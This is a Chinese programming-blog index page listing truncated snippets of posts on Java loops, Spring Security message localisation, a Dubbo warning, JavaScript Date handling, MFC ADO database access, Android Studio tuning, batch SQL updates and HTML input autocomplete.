      1. 简单的for循环 public static void main(String[] args) { for (int i = 1, y = i + 10; i < 5 && y < 12; i++, y = i * 2) { System.err.println("i=" + i + " y="
    • Spring Security(05)——异常信息本地化 234390216 exceptionSpring Security异常信息本地化
      异常信息本地化          Spring Security支持将展现给终端用户看的异常信息本地化,这些信息包括认证失败、访问被拒绝等。而对于展现给开发者看的异常信息和日志信息(如配置错误)则是不能够进行本地化的,它们是以英文硬编码在Spring Security的代码中的。在Spring-Security-core-x
    • DUBBO架构服务端告警Failed to send message Response javamingtingzhao 架构DUBBO
       废话不多说,警告日志如下,不知道有哪位遇到过,此异常在服务端抛出(服务器启动第一次运行会有这个警告),后续运行没问题,找了好久真心不知道哪里错了。    WARN 2015-07-18 22:31:15,272 com.alibaba.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(84)
    • JS中Date对象中几个用法 leeqq JavaScriptDate最后一天
      近来工作中遇到这样的两个需求 1. 给个Date对象,找出该时间所在月的第一天和最后一天 2. 给个Date对象,找出该时间所在周的第一天和最后一天   需求1中的找月第一天很简单,我记得api中有setDate方法可以使用 使用setDate方法前,先看看getDate var date = new Date(); console.log(date); // Sat J
    • MFC中使用ado技术操作数据库 你不认识的休道人 sqlmfc
      1.在stdafx.h中导入ado动态链接库 #import"C:\Program Files\Common Files\System\ado\msado15.dll" no_namespace rename("EOF","end")2.在CTestApp文件的InitInstance()函数中domodal之前写::CoIniti
    • Android Studio加速 rensanning android studio
      Android Studio慢、吃内存!启动时后会立即通过Gradle来sync & build工程。 (1)设置Android Studio a) 禁用插件 File -> Settings...  Plugins 去掉一些没有用的插件。 比如:Git Integration、GitHub、Google Cloud Testing、Google Cloud
    • 各数据库的批量Update操作 tomcat_oracle javaoraclesqlmysqlsqlite
      MyBatis的update元素的用法与insert元素基本相同,因此本篇不打算重复了。本篇仅记录批量update操作的 sql语句,懂得SQL语句,那么MyBatis部分的操作就简单了。   注意:下列批量更新语句都是作为一个事务整体执行,要不全部成功,要不全部回滚。 MSSQL的SQL语句  WITH R AS(   SELECT 'John' as name, 18 as
    • html禁止清除input文本输入缓存 xp9802 input
      多数浏览器默认会缓存input的值,只有使用ctl+F5强制刷新的才可以清除缓存记录。如果不想让浏览器缓存input的值,有2种方法: 方法一: 在不想使用缓存的input中添加 autocomplete="off"; eg: <input type="text" autocomplete="off" name
    按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他